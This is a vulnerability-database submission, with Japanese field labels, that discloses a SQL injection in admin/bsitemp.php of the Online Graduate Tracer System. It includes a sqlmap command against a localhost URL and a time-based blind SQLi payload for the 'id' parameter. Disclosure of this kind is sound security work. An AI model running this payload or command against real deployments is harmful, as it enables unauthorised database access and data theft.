| タイトル | Online Graduate Tracer System bsitemp.php sql injection |
|---|
| 説明 | Online Graduate Tracer System bsitemp.php sql injection
url:admin/bsitemp.php
Abstract:
Line 243 of bsitemp.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
1. Data enters a program from an untrusted source.
2. The data is used to dynamically construct a SQL query.
In this case, the data is passed to mysqli_query() in bsitemp.php on line 243.
sqlmap.py -u "http://localhost/tracking/admin/bsitemp.php?id=111" --level 5 --risk 3 --current-db
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=111'+(SELECT 0x67437261 WHERE 6269=6269 AND (SELECT 8178 FROM (SELECT(SLEEP(5)))mMBg))+'
Download Code:
https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html |
|---|
| ソース | ⚠️ https://blog.csdn.net/Dwayne_Wade/article/details/129522869 |
|---|
| ユーザー | bit3hh (UID 42576) |
|---|
| 送信 | 2023年03月14日 05:04 (3 年 ago) |
|---|
| モデレーション | 2023年03月14日 15:31 (10 hours later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 222981 [SourceCodester Online Graduate Tracer System 1.0 bsitemp.php mysqli_query 識別子 SQLインジェクション] |
|---|
| ポイント | 20 |
|---|